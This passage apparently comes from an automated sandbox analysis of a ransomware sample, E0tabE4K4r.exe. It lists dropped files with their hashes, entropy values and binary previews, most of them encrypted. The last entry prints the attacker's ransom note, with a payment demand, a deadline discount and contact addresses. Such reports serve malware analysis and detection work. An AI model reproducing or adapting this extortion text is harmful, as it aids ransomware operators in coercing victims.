                                                                                                                                                  Preview:<svg ...28j..'.O..`i ,.T..XJ4n..a.."...F'}P..6N:.......Wg=.R%m.jb..<a=68.....8..aQ...W.sw..\"..^.<".....;.F.>!......Vm.).....5. .-..)V...wC....q.....`N....3\..Y8anR.^.._.....;.=_.)s.!.(Na?.'...).'....M...m....~C.@.]<\j.hgI.{:e>%AN!..I...c."...S:.F.tsx.P..9.y]/......y.@..2I>......\k..4.B..?.6...&.&8kUGm.N..x..u3;\R..(.j.r.XUj=./Px........?...+.op..4.Y...r....E`..OsA.m......)^7.Ar0~.......{z...]v.N!....<..{..T..%.q..........H...P..rS.:....&}...P.q...tC.....-.....@.L(Xz.q.........[3s.N.DX.].I..3/.xV.K.+HP...Z"(..V.........b. .Q.....>.)......(Hd...7~.....) c........3.#.......h.:.....XU...|...:L*...............k...3-v..H.HD.._7.o@.h....e`p.owH`.....zF.#...?.W.hb...}[.?@...{...:2....v...j..+L.Z.=..{....52..;.1..q$.C..,..5..........I.^...~y.H.....q.k.s&V.;.$b.zg..H...u2....$.3/.......d.F..?.Zy.;.....u...bg.....$.z.m.........C.. =.).z>.....b.......,.@....LM.tY.q.I.]zr>s.d.cQ...q.....0....*..9\..XC9.......a+..`......9..:....E.7...e.Hd8#....e..=>...f_.O.9X~@

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ShellFeeds\IDX_CONTENT_TASKBARHEADLINES.json

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):127994
                                                                                                                                                  Entropy (8bit):7.99873356992345
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:1536:D+4J7o7wOusOtcFtaKKgJ+60AhaCZKTgS3+ML9jmxvUrxtAzF7u6crLYUb7of91a:D+452TuBMaKNogM9yxW4GYUC91gIsnEm
                                                                                                                                                  MD5:AAFD4970400A7475A1837F8B39FF5ABA
                                                                                                                                                  SHA1:50FD01075820BCB9121BBED337745055D21EEA66
                                                                                                                                                  SHA-256:BFF14A2CC41CAD5255CDD80C0187DDE59CA251ABD25F875399132D3C4AB5F799
                                                                                                                                                  SHA-512:CDC8565B3544971782C397F41BDE2A4A93AD052F65239D3D5E8F1D0714F0517B0B04B41E130B22D69BD493FFB88331FDD93E5A82AD34112ED899C1C54B624EE6
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:{"locmG.ks.7k..}..D...>m7.V.....>.!l....Q.....%.C. .).U.G.p.9...s.....siQ..A .c+...>_E0............(\...;.l.......[.D.......X^.O~.+L.{...!.~(.4..(.%WB.n.v.. %1n.....x..64H...ht...='..Vk')V...7@..Z.....[7....rF......u....O..y.,`. U...v....1.&..O..T..&.E...1:...8...N.`Cf..2..Gu5#.....d..v...#.dz..eP...M...6...I....=I..m|.fkVs..,&..R......G.....km..N.^3.U.u'p....3.}.......e.V"p..D|..9JRfvi.~......D......Q...Q..A. S\.5?..*vU....6.b.0...3{Y.k..g..,.%....T..o..4xfv'..<mw...;#HD}.....+..l..."....T...|..K~.4"lw=>BECp..4...........r..p...#$..Jo..o h...l.4!...BB...o..@".=....mw......O..6.b.!.n8..Q .Z.1M=....N.T....W.}..~..;..[.........._.L.2.p.J.i..X..3.....-......r0Jh..m......S.@..I.7....n..:<.36.!<.....T...c5j|..O!...m..2.8.Ovt.ki$.......!.Io......O.s.4..?.(}.....V...;.9........h.8.....}.].........4b.........c...U......**.....u..[...A'...h@..vjD...........j..1....6...$..<...9....Y..B0q..U...@6.....z..(zPg.,.....v.....8..8....X.q(.!...T<^..........;..

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):8526
                                                                                                                                                  Entropy (8bit):7.977170404614198
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:ZkW8EEGW8huoPpCZTJiEt7/EDklnoAgS3IAjo1Ur7DAOI:ZkrGXAniCLEDkZDgCXo1SD2
                                                                                                                                                  MD5:2422D0FEB5A2AF57C806AB1344ECE667
                                                                                                                                                  SHA1:DD27DA1A8E22B8DF9637242A5E931A9CEC62E137
                                                                                                                                                  SHA-256:0D4E43C4BB72B750EE4DF39E20154DA5A4D039D332E9470973074D7245CA32CF
                                                                                                                                                  SHA-512:11B30A4D8E4BB4671FDCFDC5CA0810E1E9067746C7096348EDEF3E078A1BD56299FE3BB0FCD5E9DFD30651CBDE543515C7A05F7029F144587F4A7AF493EEB522
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:regf.s._n..Mv..1.p:I-...K.t/2F....9..=[.L.{....+jc.}.).O.&Q........Wq...".....Z.]`...\*.../ux.l?.6.?.vq.$.../.....|.:C....{....p.0..vzWa..:..C.]..&.......*...*1.q@..j......`Zi.@c..p...@..4..G...O)..b /...M...+.c(.;!.~.}L...Fpb...U.E..._...Jc..Xu........U....%.a.......h.g..2.{...m....f@.r......r1.D.....s..o...E....i.....W<...^.tr..5peOn.....E.C..e4;..z..W.X..........m.q..,....o...^..4.r.q..@...b.L..pk.t..X..lA#...."3.^Q..,.)1^.d......%..v...V......r.#.......(.mh;N#y...../S.:J.Y..,....qKw0H...kJ..,].:..........?/...S.xC`.c\.U..7.&B..o@.A=.n.+....)h..u3.X.d.u..H&S..v.*.O8hW.RD.Y..8/.[~.........5..s..7.L.\q#X.b...S4,...>.].e-......-.gt....18.N.d3..t..-RE..................<.!..GE...:U.^.2...^G....<.~..GJL.Y^.e<t.....{......J.....iX...... 8..(\S.+...L..?X....r.4.D..a$.g..\..x..e...f^..V%6..@..}.Oa...z..l.....^XW....V.....8.........D;....V.&..F0...x.::K..s+..R..,.{..b$|.....;.Jr=."A.9.X7..W.q:..!...\.."Xq.z.R.<.VP.rb5...xLA..s.L.,P!.C_R.y...f}..1.)sd.#.`..^.

                                                                                                                                                  C:\Users\user\AppData\Local\Packages\Microsoft.WindowsAlarms_8wekyb3d8bbwe\Settings\settings.dat.LOG1

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:MS Windows registry file, NT/2000 or above
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):8526
                                                                                                                                                  Entropy (8bit):7.980521795090969
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:192:VdJiU41EY27KEyN17WA/omzLPPvJEIgYFQzH7ur:Vd4U41hv57f/fNxFoHir
                                                                                                                                                  MD5:AF15AAAEF0B1B5A57DCA4B620BDCCB1D
                                                                                                                                                  SHA1:57CFEEDC951682BC322EFFB22F76EF4A98C1EB86
                                                                                                                                                  SHA-256:0F2E8EF37421C05520652482AC26A678844DE1F04AED6B8A860BEF1B10C9C783
                                                                                                                                                  SHA-512:29E8057D392706B9A315F5724A29F716A5C7ACF67BC63BB96E97C7EB6D5AEA03801886EF652CC7014630C39BD73F032B5A40208ABB8349ECD23527F7804EBBD1
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:regf....A2.F.;..'Y.r|"tP..&].;...!..q.lLj.=.......Y...+B.#.i...;.F...Dc.G..]#.]......P.RS. ..;"R..Z.7.>.F.I....d&..".`..[.m..r.J.I}$o.......k5..!K.........BhT...\....].J..S8..2...|..:...ss.U'aT.@..lT.a.5c..".S`....I2k..(...L.....jG.O..W........+......m.]^.........nG..c#...>$.p.5.`..*m....w....o...z{_.w.N..*... .l.OA........Avo..<.Q\.bf..1;.oW.V.2..,......V.T.%Q..........\..+j)wQ.KYYGG..>.O0,..H.q.!.=...|.1....g.6.z`...g...kB.........h$........CRJ...p;.....eF..@. .../0.=......)..:7b../...1.s|....c.`...p.+......oc.p2... ....<<1._8...s.we.-g.{ZB.lA..a...]u?4dJ*..k.o.....V.<8..<.T...q..:N.a...|XA.1.....v......h...............$.T'...O..._ .U..0.r.r..muh... ...?....Z.B.W.GO.e.-Ya...[..9..AH...!..xb......b.[.A...M...z.v.......k.U.Z!Y.7\]c&A..YN...lF7.R.....H..NVA...k....^.QQ7Qu`.k......s.5d0..C:/t......U.{....o)...[..f..I.t.#.%,..n.r.2j.....1...#~.......t...b.)..\{v.O.....3HRI....v~"._s........(T.z..}.7...........$...?..0H{.X.3

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):8547662
                                                                                                                                                  Entropy (8bit):5.205009728291627
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:r9jPYNcMn38OPKW0ANge+q80Ibxh0T4tI6lIfKi5YJj1PKu1ZKKOn:rFPeHF1qd/LKNn
                                                                                                                                                  MD5:15585C49CDF66DE2C28E088EBF3D061A
                                                                                                                                                  SHA1:F2909073FDFF2B7FA5C8E73A6C47925EB40E9D23
                                                                                                                                                  SHA-256:1C5B7CDBBC0F8FACC552FAE7634129123B0FA1418052508722C818FF92B14E69
                                                                                                                                                  SHA-512:83A4FE0213DF63FE503750877868D66CB0CE3DC6DFEA669DC9DBDAEE80337872A88BA7EE5E7851ABA2ADDE5F833E70A4C445DEB993644DFFCC83C0142529BBD7
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:Micro.....*.Lp.`*q.......U......h[*.B.........?z.=&..s.5S.........3S........6g..m|Y..s ..Qlzk...)Q).P....'.a/h.....0..$.5..k............W..8.r...8......j..xb%..!.......j..!...W'.R.M/g.{......K.5s.O..o..'.Y.}.;..c$b...K..=.A..*SM.........{."n.l.....|..U.4.....|..37J.....B.|d.w.`L7.....y..1..G..e.F.*/...jj...x..Db(.D.l.LRX.=)o.R..7lN.|.y.Y.........W...$[!.....5..n.#Y0~+..H<....p.}\.<...fw..F...u..........5.....Jx.G....ejL0..)..@j..]^oV..a....q2..IG.....0.2.......F....p1S...._.~....!.......@..^\A.m.....!M%.m,..e,.l........9.Eh.N..{h..a.OK.8x..T.X.i`.|.C.P2.QV.H%.n....]O.:!..>P/..T...7{::*.^..F.d.S....f.]>.y.M.......zb.....]...H..h....v.G'!A.43.C....i.4.=[....L..YaH..P2.E}JoJ..j.....x............[.C.N.......bu.Z....;....4.GX.=l.*...q..Z78..nj.......,g%.."..?...<.TU......x..y..h....h(..4p..%.G.,..c.V..I0.YI9,.bI.j.....<.....h.G....Nz~.".h.#..>gH.....*.#).t(....Z.=.>(...,.5.Yc...ku../......2F.......S.t......^...y...5..,S.....,....+o.....H?.

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):8547662
                                                                                                                                                  Entropy (8bit):5.2049296443898845
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:gD6+YV38OPKW0ANge+q80Ibxh0T4tI6lIfKi5YJj1PKu1ZKKOg:gGrZF1qd/LKNg
                                                                                                                                                  MD5:075A1033307B4A6B66A71327194B8BE3
                                                                                                                                                  SHA1:73E9A15B170689FEE016C9EEAA3CF3111086D7C1
                                                                                                                                                  SHA-256:85B477A99DF0435857A6FA64B6682139B7B71FD92C3670CBD421289BE73FA105
                                                                                                                                                  SHA-512:ACA1871311FE1D909DCE3EEA3DC515A275037101285B18C90E7A3AB6126AA3247DD88AEFF816286C446F02D901D356C06AE9267576CB2FB62CDF8CBAB3E8E548
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:Micro..*"c..=.|<..#.N.hO..)&..=...b.?.({.4..c..X...4.wi..YW...i .....4....2dp...G.a.p#..jh.......bB+Y.7..r.@..........Rd.^.}.Z.f,.uY...v{y9I.@.`..?..<..31..c...{a..0.J%4....P..........}x.?-_Z..@....NS:&.k...p..e..I.U....ks.. /.Z..s.q..<y.fW..H..._M..a.;9..N.....!..?.T.e.a[HW)...W.~...g.........z!.....O...S_..........d....8...qo4..%....ke..+.+J.~.....h.<.. .TN...Y.i..X...^#..M.*>....'.].S....zR..(A.N...t.Z.....V.C.)q......%w.J...~.~%o..h...R..7..m..p..N.Nr.]b.d#...<...V...Q..h.3.G.....6".a......U.O......L...X..?O0f.no2........B4..D.6\.p...B~..'.j...+....uv.U..]...............?g.t.....G...[....t..t...V.....v..L...>..j*+h.dU4o.,'.1....WX...49G.F....)...%.$c. ..N....{.C.^Jp.....;(Z`.O.WJ...A./.U..|..C8,.{s....n........E.1..v.k.....B<.....bTKrd..........^..,l*^.......K.....".....p.\..}.:...B.I.#.?...J7hroOb[...5O....f.st.....$.6*.`G.k!G@.8.j..R.@@.w~...T}....)o..u.....*.p...O...F=..z....>v+......!.....c.x.`......Jxd>,S......|G..*......P.-.U.....:.y

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1192270
                                                                                                                                                  Entropy (8bit):5.662162782825003
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:i/Ye8WqtA9JQ4aKVmaS4aMz8Pg3lxJo2cvXtC:i7YiBaKVzaYcAqtC
                                                                                                                                                  MD5:A4DD4B30FCBFD7B93B7270C04B84A4A8
                                                                                                                                                  SHA1:3BDC07BCA602D2B54557ACD20EB6FE2A48FCA4DE
                                                                                                                                                  SHA-256:2F9B60F421CCD21AA224439FDAC65CD424231DCF24C209C6A4DDA29480E1D284
                                                                                                                                                  SHA-512:F48269A5828F7F0C5D88DAAC045FD43E725F3F5AE19252AD26ECAD05EC20F425A0105ABB1340F0FBAE11B28CE8C2AFC0FFF8F116D0E65B2979BE8BE6D83C7E14
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:Microx.M..d....a}..^..).p.#.b...3X.v.UP.#R.3.9[...?.*PJ..eE0X.}...{.3.8.YT.l.%$1..;..qU.'... ...q.u..E.|...*...r-....VH[...J.2..V....3ZW..5..?ZI.71."\..r..V+.Y.....`.(..XA.......Hs7f..$7r...(I.>........U..i...(.hO.f.Dz.Ce..5...K..R...'..n......C..`..g.....w0C!...S)'b.$..c.>.m.._y...x\]}....o..e..e. .yyR..7i....|J(.3Q.w2...o.J2.V.Cu..^.'.O]m...[..6.,..7Mjo.U.z...2.l.4.MQRU...wd]G.c..F....r..z0.m.YC|..fC.......6..D....{Eo)...^'.....{..s.%.(uE..U/.o..3D..u..vA..}....=....{.{r.p..k..x..k..4fC2.}....C.}.z.-}.......G.'5.......\....w...E.t..:....;.FJ?...t...7&.C.:q.j.l.9_.N....#.i.w..(G..(|...p{..a4....o........w...1. .N..IuK.E5.R..f..2.m..~..Mb...{"....C...=`................<.....y..,....:..:F...[.I...c.+...BlGS+...&...mFL.......3... r..v..|f]...<{8...$$.@...p..>>.($.J"..i.....<S2b..Z....J.2....X.i@.3..^.*l{E..h........fm...<../z.5X.w..Fwg...Ud6.g.../6....jk.S.....eG'....=Qe.vhz..M.s-......g.[..t~l..tl....Hp.....%l...>2..).O.m...g3...o$.M.....f.

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1192270
                                                                                                                                                  Entropy (8bit):5.662886563489427
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:T4Or5ChRJQ4aKVmaS4aMz8Pg3lxJo2cvXtY:8OdCjBaKVzaYcAqtY
                                                                                                                                                  MD5:9FE51B3E6C9A69DA500D7CE631C55C5D
                                                                                                                                                  SHA1:89DB6D9F62E875880DD483A5D1D153DDD4C5C063
                                                                                                                                                  SHA-256:21ED3D613F14D1122EFC196093522D2D4CEBF2304F0EE0463622D4E4AF042935
                                                                                                                                                  SHA-512:2DE4029D63ED02D3934D9594C6A0A374FAD75EF7DDBAEB8B21EAAE2BE8C07878F108A8E7C85BDC744A21B9D43BE4D82805091B98C4C510D66AD5E7D6FF1C8732
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:Micro..r@5.U...~<.....f......a.........$jRQJ...V..(d3..d.t........?.n..b......r]{W.1..>. .c....n.........$.'?@.<...0......;l.T?".*j....g%.x.a.}.H...4....L_..HVt..6...=...]./.....!.z5.....'...=...a.........I......"..C...F/1...S .@S...g...V.....u.......vB..5...&....]......R.N...%p..:..~...E.. ..W..c..VNZ.;^..b.9..A.|..A.'x.:.T.T....Vf...Wu...=..W<.....|.Q....q.......Ax..........-.L..@....nq..~4#.........Kvn+......I56d O..|L+.{..h.m.....Qg.V../[.2G....T.o:....*.....t.zd#..5....g."..}.....{E..y..s......s=P6tXHD.!}S.....A..::.p'..K...c......c.~.nfR`.N....$..U.9.......f..Y..dC...7W..u...:f"...Y6....M.h...<N..V..9............R=.tc.+.......t$ Q,..(. a..5..?{.!...OZ.I.Bp._.=.J..9Y'...T9`.^..*.*.)....!.e......=.P..F.,772."...l.8...y..i....z<P/4LY...w...6......[..<.J.,.....8H?.[#...B..x.".._ t~iV..7..."BE..6.#.......G.F....*q~.a..@)..."fD......%0.|R..*..&.gp.....%.O.5.U...[A.}..S..z.L%.).)qj...y|.TpP...Tf.........VK.O...Go.].lX....x..+|.....R.

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):30179
                                                                                                                                                  Entropy (8bit):7.993559128361054
                                                                                                                                                  Encrypted:true
                                                                                                                                                  SSDEEP:768:UpR+AujeXwI8Dv0yA7UXf9rEbffidKxB6Dilq9RJgOXZ3X:07wI+v/WnnidK/6Sq9LgY3X
                                                                                                                                                  MD5:BD8FD2A187E31EBEC60BBD4C2784FDA0
                                                                                                                                                  SHA1:E9066FAC436808B1C0F70B1ADB163A2E55FB9A76
                                                                                                                                                  SHA-256:F3764C74518463A3D6A4C7EE6795D4BE40ADAE4BB33D98F82C8A00D8783B3151
                                                                                                                                                  SHA-512:154292E0E2DD284B7F898C2973406C7CCAD9E941CC4BD27027BAED937DDD64DD82EEA1BF16840C9B769F19F290D0879A197EE93EE475E1DC0AD26F59BC4FCC63
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:05-10.X..*n..d?......Q{18...c.J..2.f.......$.>!...P.:..5.^...[..l~Z..C....Z&.4#.9....v.p...}j...~..o}..<YI..._m.~.t..f..*h..`..q5^.+.7.;."...^i.G.P.T.*.\1^`:...........`...[.:.glP.K8.0..Kg#]'...'......"...R=!.ABp... ....V...S..."....]@..c...<". ......Q..v....??Y.Wd'.>T.@hG....*.(........?.'.<F....~s..s.V..C.T........tlBe..=...[..k..i.....i.M...TTk....s%...:+...............sT`..........e.....}.7..:....UG;."&...V.........-....p...{O...{...N......=P...y-@.V. ).,Z...O3i........D..[...U..R..,...+.J...$....z..O..yE.B.Hf...:..lP.4.....?.;.M...>tD.L2.L...1Y.iM.c=.r.xV...9...s.'xe...rbu..SZ.+a...a...G...T....9.......of.f)n6N...C]I.-.JN.0.../(,.E....N.{....Z_....cI.(.@......t..vn..^.N.H...n...(5..R...'.y...CZ$..(...gf.u."....N.?...e]...Tu.....E....ru......Iw.0..y....."......O...L..h.....P.zW-...Kz.t..I.08..k..^..v..e.iqX.Gx........h~..R..1........{..o.....|V...X..v?.+C.&..5!..|Nc...3..Y......x.p$...Vn.c...U|.R#..m.p:.KId...^x.A..P.@H..AoW.4...

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\wmsetup.log

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1031
                                                                                                                                                  Entropy (8bit):7.777753916344055
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:tgwv13erwc8Q7DaqTkINUxuzzkvz3T25vcle85n+Fnf2bD:Oci8NcRNUAzzkvv2mMn8D
                                                                                                                                                  MD5:EB9C09D8D03D8912478B7EDEE8902700
                                                                                                                                                  SHA1:D0373ADCD36A47CE03BD647F4839DB6922A991B7
                                                                                                                                                  SHA-256:0369AF018203D396C0677AEFBB1C4F5F381BF5FC3C2F1E1493EB2AEE872C7B3A
                                                                                                                                                  SHA-512:C04E7AA7E899D94948776F45CF57A95B332DA9A6CCCA9C744F610D0F67F1F8F3A8C806738AF01F3C3B1CC1E42398B4404E55EE74A6B21A62D0B250F81D07546A
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:..[*Wa...oo...bA[.=....t..WI....J..`.<..P._....<..JGa.......[..-j..o.z.C.:.GX.. .U.\.?..`.Ij'?>JL.6..Sz..W.3:.}CPS.&..(K.T=.I..cX#..t...$l......;h..C8*...-..A5Y.q^D.....=.?=...R.......)..c...j....;.....`..[...S;.)....U..hr.*&R.8o~B=...>..7nK3..s.I.O.^Z..lT........vR.B6...?.M...n.s.]..a..t....7...5......FK.i.2..i;...@.........].h..../H.y<HY.X.....S...eM....:."....@..y......;.2..<..H.Q.U`.7.+........c....s...4.....z"./..g.*.....5.d'.xN..MT<.?.....1t.bv.>.;.c.. ..|Tdy.o.f..A.....o..F..q.9....a#...f.w..@....-B.o..6=L......../...E.e.......h.8..f%Z,>....L0VX..w/.KGXow.3.?y..:.t UY..dB..2..C.....tNAQ.'.....N.^.fXv0s4Xa..%s..tF........n..'y.>-v...:.4a:.H=\w.a~k......O....uLh.U.,Qy...@....X.F....."B.....`.....,6Y..Hi.0hk...9.j..z!.......T...0.i..m......o.KQKO.l..).p...r..\.a\.....9...6.\%z.#)B.).....~<..........'^..t.x.b..x"z"..|....W.....]..o...GR.AU.<....i.].<.I=h...m.../.M`.8.Q.0s.*...mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{40EDAAB0-8A3E-4575-8B64-F20B6714F07D}.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6130
                                                                                                                                                  Entropy (8bit):7.971599445379854
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:QY0InD80yI8Ukg7qlagWE0ExQ8Evyyid1V0pQZ6s2woME/Oyd/IL:QYZD2GEnmJyJeIjbOOW/S
                                                                                                                                                  MD5:A2AAFCB1E81E9CF69045B421FDA9AE5C
                                                                                                                                                  SHA1:AD971C078911F46B0D138FBD00DD05AB30F00A8D
                                                                                                                                                  SHA-256:E51FEE1694F428691C49D8EC6C5E6233AE1322FE1F6A11AD83DFD6BFBB3887AA
                                                                                                                                                  SHA-512:3FB3291960459F91C072E9F7848C377B9E745C8733884BA11086F2836C91D02E0545B56411A3CABA20A90E2AE113499F3081DAEF5C3C6CC92B6A9067E2B9D7A6
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.PNG..U.f..y.Vj... ......5..[...C..d..1..A....`T.s..)...I.LY..(E...GC....q.(x]..P..#/D.v&.........G.R..4[....i.. .......l.'v.....Xe...k...+.....H.K....I.d.r..q...<un.C....q.l..#...i..6>9...~....[....6....z.{...RR...M.q.w.......]2...u......WVn..I..6>..w.....L....*...kQ..E..q.2.LH..........k.Pa..IL..V)[...X.9~.1:.P=.."...XZ...K0.....L.Hn...#.r.w......4..vZ.a?.i8[Z#.D..Va.ct.av..!..@...g.1F..Dc!.5:7.r.....W.u. .....oQ.......\.H..D..=o.......E..=.:.X>...{.v.pVu_)..*J.l....#xM.1...g}*..g.)...=O;.a.#..}.>4.1..6.K.'./y.fc a..A.,g58.%(..5..u.%b.c.T.|....`......:...[.Lkg.W+>>-...^.4O......{..&....3I.4`..*.g_.jFo@.s2...bU.$.O`..f..V.O8......>.:\.1...fVB....$Z(#{$......%..3...Z..|9..&LvW...g9.q&:u...|W..3~.L....y...;.A.g.pp..42.........:.F..px..8.vR.,..\.S. ......mFur..T.x...h...o..I.L.f.b."..-).....e...3P....>.o,.!...?lUm...w....4K....w1...GG_5.h.n.,..c..}.u.....a.7Z.-.=T.WHNG^....j9..p.....WG...5.......X..>....c.q.....=&...{.~.."..Rok.a\9.`t..a..z.Z<..\..

                                                                                                                                                  C:\Users\user\AppData\Local\Temp\{561F9F4C-5906-4D4D-8807-06CDEFA19E59}.png

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\Desktop\E0tabE4K4r.exe
                                                                                                                                                  File Type:data
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):6130
                                                                                                                                                  Entropy (8bit):7.968845782550198
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:96:KCfQTFyMQ4BJQcX3MXDgv7L53xHUxvfdRjq9U3PqL/yOhErbm9sQx5og+PHtW7Qw:KCf29yI0Dgv7jHUBfdBEU3PyLEfm9sQH
                                                                                                                                                  MD5:6B936A07CD5B8A6FC04DB5E109F67390
                                                                                                                                                  SHA1:63F0D26C658D4C0542E04FF1A93872BE75FCD6AD
                                                                                                                                                  SHA-256:789961A4CE1811245F32EFC812675CA6ACD7279901429381BE20A87C86615FE6
                                                                                                                                                  SHA-512:385769120D98EE1D115B6238BFD3BB962B0C1151FD3A8D5762A785256B25F0270418E03BC9CF2D9063160376EE33A1212FDB56D99D7751FC92636B4AAA74D691
                                                                                                                                                  Malicious:false
                                                                                                                                                  Preview:.PNG...{_:.V.*uT.......d../l.j...d.b.98*..[.vb{AaO..".C.| ..xY1(.&.5_f7.u.D..m.e..$6S...`_..h..f.....a...nN..*...#'u.BoT...%"..G..27x{\.U._.E%..YT;^.....y......-Z.......#C.I2..X..E~.....d.S......r...I%..[...`3L.i..Vv...)9<..{@..$...(....fV,IU.f.....A.:.@....l.k...z(.*....W.hlI....O...V....f...df..F.~....N..^io.!..S7...3P@....r....YS.}.P.."...m.@....y. C.}.. ^HB..1F.E...KX..\3?.I.z......6.e1g..WI.....6.*+.m.0_.YL....Qv.v....[h{.........v..b.R.@du..o.z....@..n+KsMO:$d...YyDuW..y.S&....1E.!.(r%..(..l.N...n...z-@A%..l.....8.....;...;p...I..0....R...c...O.wp.Ud.Q...M1..XJ.K................tR[.6.TsRE].........J)..K3...g..r(S.r!.)...g..<..u...Y..a~.k.W.D!k.qh...^..g.v.kW.&.x....8..j...^.....X..8.4{ow.....o:...^..;b/.l..%..%..d.YiZ...5W..."m.n.u.qo~alg$)m.....f...c..-...Q....;...xmg;`@...`.E..Hd0...y..iM...y...%"..z.......'..c5..C....*.Y...$.%......R+....4..5......l7..^....r.@.U.j...7:...$0.F.a."D.1..=.J^."..J:.S^....3z...,Y[y.....4]

                                                                                                                                                  C:\Users\user\AppData\Local\VirtualStore\_readme.txt

                                                                                                                                                  Download File
                                                                                                                                                  Process:C:\Users\user\AppData\Local\1d65c2a7-57e4-4788-a32b-5160ef2f20c8\E0tabE4K4r.exe
                                                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1120
                                                                                                                                                  Entropy (8bit):4.8813841704398335
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24:FS5ZHPnIekFQjhRe9bgnYLuW4mFRqrn6324kA+GT/kF5M2/kJw3RJDYU:WZHfv0p6W4Pn42rDGT0f/kip
                                                                                                                                                  MD5:822BB4480CCD5A254FEFFEB5165B81CA
                                                                                                                                                  SHA1:E13D49EF6F766A96EA95B7C114BD6515BD17B9FD
                                                                                                                                                  SHA-256:0731CBE58944CED1C2B98A4F2E299560B9461E47F3FA528E2183379EC698EF30
                                                                                                                                                  SHA-512:E9F961BC43076F67D30976118863D3A79F840E169E8485E708C927D6B864D0559EDC48B36BC74CC1C6FBA6722D5A42F53052BFB12AF3698AD632CBBD08818B78
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-99MNqXMrdS..Price of private key and decrypt software is $1999...Discount 50% available if you contact us first 72 hours, that's price for you is $999...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..support@freshingmail.top....Reserve e-mail addr

